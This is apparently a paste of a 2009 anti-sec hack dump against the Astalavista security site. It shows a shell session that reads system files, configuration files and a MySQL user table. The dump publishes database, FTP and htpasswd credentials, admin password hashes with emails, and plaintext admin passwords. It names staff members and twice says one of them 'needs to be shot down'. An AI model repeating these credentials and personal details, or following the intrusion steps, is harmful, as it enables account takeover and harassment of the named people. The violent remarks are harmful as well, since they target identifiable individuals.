Feb 9th, 2012
  1. ASTALAVISTA
  6. The Hacking & Security Community
  7. [+] Founded in 1997 by a hacker computer enthusiast
  8. [-] Exposed in 2009 by anti-sec group
  9.  
  10. From <http://astalavista.com/faq>:
  11. >> 03. Who's behind the site?
  12. >>
  13. >> A team of security and IT professionals, and a countless number of contributors from all over the world.
  14.  
  15. >> 05. Is it true that the site is visited by script-kiddies and warez fans only?
  16. >>
  17. >> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and military institutions.
  19. >> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
  20.  
  21. Why has Astalavista been targeted?
  22.  
  23. Other than the fact that they are not doing any of this for the "community" but
  24. for the money, they spread exploits for kids, claim to be a security community
  25. (with no real sense of security on their own servers), and they charge you $6.66
  26. per month to access a dead forum with a directory filled with public releases
  27. and outdated / broken services.
  28.  
  29. We wanted to see how good that "team of security and IT professionals" really is.
  30.  
  31. Let's begin.
  32.  
  33. anti-sec:~# ./g0tshell astalavista.com -p 80
  34. [+] Connecting to astalavista.com:80
  35. [+] Grabbing banner...
  36. LiteSpeed
  37. [+] Injecting shellcode...
  38. [-] Wait for it
  39.  
  40. [~] We g0tshell
  41. uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  42. ID: uid=100(apache) gid=500(apache) groups=500(apache)
  43.  
  44. sh-3.2$ cat /etc/passwd
  45. root:x:0:0:root:/root:/bin/bash
  46. bin:x:1:1:bin:/bin:/sbin/nologin
  47. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  48. adm:x:3:4:adm:/var/adm:/sbin/nologin
  49. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  50. sync:x:5:0:sync:/sbin:/bin/sync
  51. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  52. halt:x:7:0:halt:/sbin:/sbin/halt
  53. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  54. news:x:9:13:news:/etc/news:
  55. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  56. operator:x:11:0:operator:/root:/sbin/nologin
  57. games:x:12:100:games:/usr/games:/sbin/nologin
  58. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  59. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  60. nobody:x:99:99:Nobody:/:/sbin/nologin
  61. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  62. dbus:x:81:81:System message bus:/:/sbin/nologin
  63. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  64. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  65. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  66. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  67. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  68. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  69. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  70. nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  71. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  72. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  73. named:x:25:25:Named:/var/named:/sbin/nologin
  74. apache:x:100:500::/var/www:/bin/false
  75. diradmin:x:101:101::/usr/local/directadmin:/bin/bash
  76. mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
  77. webapps:x:500:501::/var/www/html:/bin/bash
  78. majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
  79. admin:x:501:502::/home/admin:/bin/bash
  80. jon:x:502:503::/home/jon:/bin/bash
  81. com:x:503:504::/home/com:/bin/bash
  82. ntp:x:38:38::/etc/ntp:/sbin/nologin
  83. ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
  84. astanet:x:504:505::/home/astanet:/bin/bash
  85. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  86. avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  87.  
  88. sh-3.2$ cat /etc/hosts
  89. # Do not remove the following line, or various programs
  90. # that require network functionality will fail.
  91. 127.0.0.1 localhost.localdomain localhost
  92. ::1 localhost6.localdomain6 localhost6
  93. 80.74.154.172 asta1.astalavistaserver.com
  94.  
  95. sh-3.2$ pwd
  96. /home/com/public_html
  97.  
  98. sh-3.2$ ls -la
  99. total 18460
  100. drwxr-xr-x 30 com apache 4096 May 28 17:06 .
  101. drwx--x--x 11 com com 4096 Jun 25 2008 ..
  102. drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
  103. drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
  104. drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
  105. drwxrwxrwx 2 com com 4096 May 19 00:50 config
  106. drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
  107. drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
  108. drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
  109. drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
  110. drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
  111. -rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
  112. drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
  113. drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
  114. -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
  115. drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
  116. -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
  117. -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
  118. -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
  119. drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
  120. drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
  121. -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
  122. drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
  123. drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
  124. drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
  125. drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
  126. drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
  127. drwxr-xr-x 34 com com 4096 May 28 16:30 modules
  128. drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
  129. drwxrwxr-x 22 com com 4096 May 28 17:06 _new
  130. drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
  131. drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
  132. drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
  133. -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
  134. -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
  135. -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
  136. drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
  137. drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
  138. drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
  139.  
  140. sh-3.2$ head -20 index.php
  141. <?php
  142.  
  143. /**
  144. * The main page for the CMS
  145. * @copyright CONTREXX CMS - COMVATION AG
  146. * @author Comvation Development Team
  147. * @version v1.0.9.10.1 stable
  148. * @package contrexx
  149. * @subpackage core
  150. * @link http://www.contrexx.com/ contrexx homepage
  151. * @since v0.0.0.0
  152. * @todo Capitalize all class names in project
  153. * @uses /config/configuration.php
  154. * @uses /config/settings.php
  155. * @uses /config/version.php
  156. * @uses /core/API.php
  157. * @uses /core_modules/cache/index.class.php
  158. * @uses /core/error.class.php
  159. * @uses /core_modules/banner/index.class.php
  160. * @uses /core_modules/contact/index.class.php
  161.  
  162. sh-3.2$ cd config/
  163. sh-3.2$ ls -la
  164. total 32
  165. drwxrwxrwx 2 com com 4096 May 19 00:50 .
  166. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  167. -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
  168. -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
  169. -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
  170. -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
  171.  
  172. sh-3.2$ cat configuration.php
  173. [snip]
  174. $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
  175. $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
  176. $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
  177. $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
  178. $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
  179. $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
  180. $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
  181. [snip]
  182. $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
  183. $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
  184. $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
  185. $_FTPCONFIG['port'] = 21; // Ftp remote port
  186. $_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
  187. $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
  188. $_FTPCONFIG['path'] = '/'; // Ftp path to cms
  189.  
  190. sh-3.2$ cd ..
  191. sh-3.2$ cd dvd/
  192. sh-3.2$ ls -la
  193. total 2913780
  194. drwxr-xr-x 2 com com 4096 Sep 9 2008 .
  195. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  196. -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
  197. -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
  198. -rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
  199. -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
  200.  
  201. sh-3.2$ cat .htaccess
  202. authType Basic
  203. authName DVD
  204. authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
  205. require valid-user
  206.  
  207. sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
  208. DVDdownload:CRD8cuY6.MPT6
  209. DVDdownload2:CR8a36.wluFMg
  210.  
  211. sh-3.2$ cat test.php
  212. <?php
  213. $url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
  214. $url = str_replace(array('&amp;', '&#38;'), '&', base64_decode(rawurldecode($url)));
  215. echo $url;
  216. ?>
  217.  
  218. sh-3.2$ cd modifications/
  219. sh-3.2$ ls -la
  220. total 32
  221. drwxr-xr-x 8 com com 4096 May 11 12:48 .
  222. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  223. drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
  224. drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
  225. drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
  226. drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
  227. drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
  228. drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
  229.  
  230. sh-3.2$ ls -R
  231. .:
  232. com_avtng cronjobs onlinetools pjirc search _tmp
  233.  
  234. ./com_avtng:
  235. avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
  236.  
  237. ./com_avtng/scripts:
  238. popunder.js
  239.  
  240. ./cronjobs:
  241. exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
  242.  
  243. ./cronjobs/tmp:
  244. contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
  245.  
  246. ./onlinetools:
  247. index.php
  248.  
  249. ./pjirc:
  250. a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
  251. AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
  252. background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
  253.  
  254. ./pjirc/img:
  255. ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
  256. arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
  257. verre-eau.gif
  258. argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
  259. verre-vin.gif
  260. ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
  261. biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
  262.  
  263. ./pjirc/snd:
  264. bell2.au ding.au
  265.  
  266. ./search:
  267. searchEngines.php search.php
  268.  
  269. ./_tmp:
  270. defaultPorts.php defaultPorts.txt
  271.  
  272. sh-3.2$ cd cronjobs/
  273. sh-3.2$ cat exploits.php
  274. [snip]
  275. $categories = array();
  276. $milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
  277. $expolits = file($milw0rmFile);
  278. $comExploits = array();
  279. [snip]
  280. // manage data
  281. for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
  282.  
  283. // get path and title
  284. $expolits[$x] = trim($expolits[$x]);
  285. $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
  286. $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
  287.  
  288. // check if file exists
  289. if (file_exists($path)) {
  290.  
  291. $text = file_get_contents($path);
  292.  
  293. // get content and date
  294. //$text = htmlspecialchars($text, ENT_QUOTES);
  295. $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
  296. if ($tmptext != '') {
  297. $text = $tmptext;
  298. } else {
  299. $text = addslashes(htmlentities($text, ENT_QUOTES));
  300. }
  301. $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
  302. $tmp = explode('-', $date);
  303. $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
  304. $cat = getCategory ($path);
  305. $ext = pathinfo(basename($path));
  306. $ext = $ext['extension'];
  307. $qStr = "
  308. SELECT `id`
  309. FROM `contrexx_module_exploits`
  310. WHERE `title` = '" . $title . "'
  311. AND `date` = '" . $date . "'
  312. ";
  313. echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
  314. $q = $_objDB->query($qStr);
  315.  
  316. if ($q->numRows() == 0) {
  317.  
  318. // prepare array
  319. $comExploits[$x]['date'] = $date;
  320. $comExploits[$x]['title'] = $title;
  321. $comExploits[$x]['author'] = 'milw0rm';
  322. $comExploits[$x]['text'] = $text;
  323. $comExploits[$x]['source'] = $ext;
  324. $comExploits[$x]['url1'] = '';
  325. $comExploits[$x]['url2'] = '';
  326. $comExploits[$x]['catid'] = $cat;
  327. $comExploits[$x]['lang'] = '2';
  328. $comExploits[$x]['userid'] = '12';
  329. $comExploits[$x]['startdate'] = '0000-00-00';
  330. $comExploits[$x]['enddate'] = '0000-00-00';
  331. $comExploits[$x]['status'] = '1';
  332. $comExploits[$x]['changelog'] = $date;
  333.  
  334. }
  335. [snip]
  336. $xml = '<?xml version="1.0" encoding="UTF-8"?>
  337. <rss version="2.0">
  338. <channel>
  339. <title>ASTALAVISTA.com - Exploits</title>
  340. <link>http://www.astalavista.com/exploits</link>
  341. <description>All availably Exploits.</description>
  342. <language>en-us</language>
  343. <lastBuildDate>' . date('F, j M Y H:i:s O') . '</lastBuildDate>
  344. <docs>http://blogs.law.harvard.edu/tech/rss</docs>
  345. <generator>Astalavista.com</generator>
  346. <webMaster>info@astalavista.com</webMaster>' . $items . '
  347. </channel>
  348.  
  349. </rss>';
  350.  
  351.  
  352. if (file_exists(FULLPATH . '/feed/exploits.xml')) {
  353. unlink (FULLPATH . '/feed/exploits.xml');
  354. }
  355.  
  356.  
  357. file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
  358. [snip]
  359.  
  360. sh-3.2$ cat exploits.sh
  361. #!/bin/sh
  362.  
  363. ###########################################################
  364. # #
  365. # Title: milw0rm exploits adder #
  366. # Description: Add all milw0rm exploits to the #
  367. # Astalavista.com database #
  368. # #
  369. # Company: Astalavista Group #
  370. # Author: Paulo M. Santos #
  371. # E-Mail: paulo.santos@astalavista.ch #
  372. # #
  373. ###########################################################
  374.  
  375.  
  376. # path
  377. this_path=/home/com/public_html/modifications/cronjobs
  378.  
  379. # change directory
  380. cd $this_path
  381. cd tmp/
  382.  
  383. # delete files
  384. rm -rf milw0rm.tar.* &
  385. rm -rf milw0rm/ &
  386.  
  387. # wget milw0rm paket
  388. wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
  389.  
  390. # extract milw0rm paket
  391. tar -xvf milw0rm.tar.bz2
  392.  
  393. # change owner
  394. chown -R com .
  395. chgrp -R com .
  396.  
  397. # execute php script
  398. cd $this_path
  399. php -q exploits.php
  400.  
  401. # delete files
  402. rm -rf tmp/milw0rm.tar.*
  403. rm -rf tmp/milw0rm/
  404.  
  405. sh-3.2$ echo "Paulo M. Santos needs to be shot down."
  406. Paulo M. Santos needs to be shot down.
  407.  
  408. mysql -u contrexxuser2 -p
  409. Enter password:
  410. Welcome to the MySQL monitor. Commands end with ; or \g.
  411. Your MySQL connection id is 261694
  412. Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  413.  
  414. Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
  415.  
  416. mysql> show databases;
  417. +--------------------+
  418. | Database |
  419. +--------------------+
  420. | information_schema |
  421. | com_contrexx2 |
  422. | com_contrexx2_live |
  423. | test |
  424. +--------------------+
  425. 4 rows in set (0.00 sec)
  426.  
  427. mysql> use com_contrexx2_live
  428. Database changed
  429. mysql> show tables;
  661. 227 rows in set (0.01 sec)
  662.  
  663. mysql> select count(*) as skids from contrexx_access_users;
  664. +-------+
  665. | skids |
  666. +-------+
  667. | 53699 |
  668. +-------+
  669. 1 row in set (0.00 sec)
  670.  
  671. mysql> describe contrexx_access_users;
  672. +------------------+------------------------------------------+------+-----+--------------+----------------+
  673. | Field | Type | Null | Key | Default | Extra |
  674. +------------------+------------------------------------------+------+-----+--------------+----------------+
  675. | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
  676. | is_admin | tinyint(1) unsigned | NO | | 0 | |
  677. | username | varchar(40) | YES | MUL | NULL | |
  678. | password | varchar(32) | YES | | NULL | |
  679. | regdate | int(14) unsigned | NO | | 0 | |
  680. | expiration | int(14) unsigned | NO | | 0 | |
  681. | validity | int(10) unsigned | NO | | 0 | |
  682. | last_auth | int(14) unsigned | NO | | 0 | |
  683. | last_activity | int(14) unsigned | NO | | 0 | |
  684. | email | varchar(255) | YES | | NULL | |
  685. | email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
  686. | frontend_lang_id | int(2) unsigned | NO | | 0 | |
  687. | backend_lang_id | int(2) unsigned | NO | | 0 | |
  688. | active | tinyint(1) | NO | | 0 | |
  689. | profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
  690. | restore_key | varchar(32) | NO | | | |
  691. | restore_key_time | int(14) unsigned | NO | | 0 | |
  692. | u2u_active | enum('0','1') | NO | | 1 | |
  693. +------------------+------------------------------------------+------+-----+--------------+----------------+
  694. 18 rows in set (0.00 sec)
  695.  
  696. mysql> select username,password,email from contrexx_access_users where is_admin = 1;
  697. +------------+----------------------------------+-----------------------------+
  698. | username | password | email |
  699. +------------+----------------------------------+-----------------------------+
  700. | system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
  701. | prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
  702. | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
  703. | schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
  704. +------------+----------------------------------+-----------------------------+
  705. 4 rows in set (0.04 sec)
  706.  
  707. mysql> exit;
  708. Bye
  709.  
  710. [~] There you go, your "team of security and IT professionals" is a joke.
  711.  
  712. +------------------------------+
  713. system:f82BN3+_*
  714. Be1er0ph0r:belerophor4astacom
  715. prozac:asta4cms!
  716. commander:mpbdaagf6m
  717. sykadul:ak29eral
  718. +------------------------------+
  719.  
  720. [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  721. ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
  722.  
  723. [~] Let's move to astalavista.net now.
  724.  
  725. From <https://www.astalavista.net/>:
  726. >> Everyone knows that the best defense is a good offense.
  727. >> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
  728. >> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
  729. >> It's a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.
  730.  
  731. >> Go ahead, try and hack our server - in a completely legal way!
  732. >> Learn by doing: We offer our members tricky tasks and challenges on an
  733. >> ongoing basis so you can test your knowledge and abilities. You can also
  734. >> demonstrate what you've mastered by taking part in regular hacker contests
  735. >> and war games
  736.  
  737. [~] Let's take a look there, after all... they are hack-proof, aren't they?!
  738.  
  739. [-] Tricky task: Find home dir of astalavista.net
  740.  
  741. sh-3.2$ ls -la ~astanet
  742. total 48
  743. drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
  744. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  745. drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
  746. -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
  747. -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
  748. -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
  749. -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
  750. drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
  751. drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
  752. drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
  753. lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
  754. -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
  755.  
  756. sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
  757. sh-3.2$ ls -la
  758. total 200
  759. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
  760. drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
  761. drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
  762. drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
  763. drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
  764. drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
  765. drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
  766. -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
  767. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
  768. drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
  769. drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
  770. -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
  771. -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
  772. drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
  773. drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
  774. -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
  775. -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
  776. -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
  777. -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
  778. -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
  779. -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
  780. -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
  781. drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
  782. drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
  783. drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
  784. drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
  785. drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
  786. drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
  787. drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
  788. -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
  789. drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
  790. -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
  791. drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
  792. drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
  793. drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
  794. drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
  795. drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
  796. drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
  797. drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
  798. drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
  799. -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
  800. drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
  801.  
  802. sh-3.2$ head -20 index.php
  803. <?PHP
  804. /**
  805. * Mainfile (external) for astalavistaNET v2.0
  806. *
  807. * @copyright Astalavista IT Engineering GmbH
  808. * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
  809. * @version 1.0
  810. */
  811.  
  812. if ($_SERVER['PHP_SELF'] == '/webcash.php') {
  813. $dontStartSession = false;
  814. } else {
  815. $dontStartSession = true;
  816. }
  817. require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
  818. require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
  819. require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
  820. require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
  821.  
  822. sh-3.2$ cd config
  823. sh-3.2$ ls -la
  824. total 32
  825. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
  826. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  827. -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
  828. -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
  829. -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
  830. -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
  831. -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
  832.  
  833. sh-3.2$ cat com.conf.php
  834. [snip]
  835. //member-database
  836. $_CONFIG['db_mem_server'] = 'localhost';
  837. $_CONFIG['db_mem_database'] = 'astanet_membersystem';
  838. $_CONFIG['db_mem_user'] = 'astanet_db';
  839. $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
  840. $_CONFIG['db_mem_debug'] = false; //true or false
  841. //ads-database
  842. $_CONFIG['db_ads_server'] = 'localhost';
  843. $_CONFIG['db_ads_database'] = 'astanet_ads';
  844. $_CONFIG['db_ads_user'] = 'astanet_db';
  845. $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
  846. $_CONFIG['db_ads_debug'] = false; //true or false
  847. //rainbow-database
  848. $_CONFIG['db_rainbow_server'] = '212.254.194.163';
  849. $_CONFIG['db_rainbow_database'] = 'rainbow';
  850. $_CONFIG['db_rainbow_user'] = 'dinu';
  851. $_CONFIG['db_rainbow_password'] = 'dinudinu';
  852. $_CONFIG['db_rainbow_debug'] = false; //true or false
  853. //mailing lists database
  854. $_CONFIG['db_mailing_lists_server'] = 'localhost';
  855. $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
  856. $_CONFIG['db_mailing_lists_user'] = 'astanet_db';
  857. $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
  858. $_CONFIG['db_mailing_lists_debug'] = false; //true or false
  859. //paypal
  860. $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
  861. $_CONFIG['sub_pp_cmd'] = '_xclick';
  862. $_CONFIG['sub_pp_business'] = 'info@astalavista.net';
  863. $_CONFIG['sub_pp_noship'] = '1';
  864. $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
  865. [snip]
  866.  
  867. sh-3.2$ cd ..
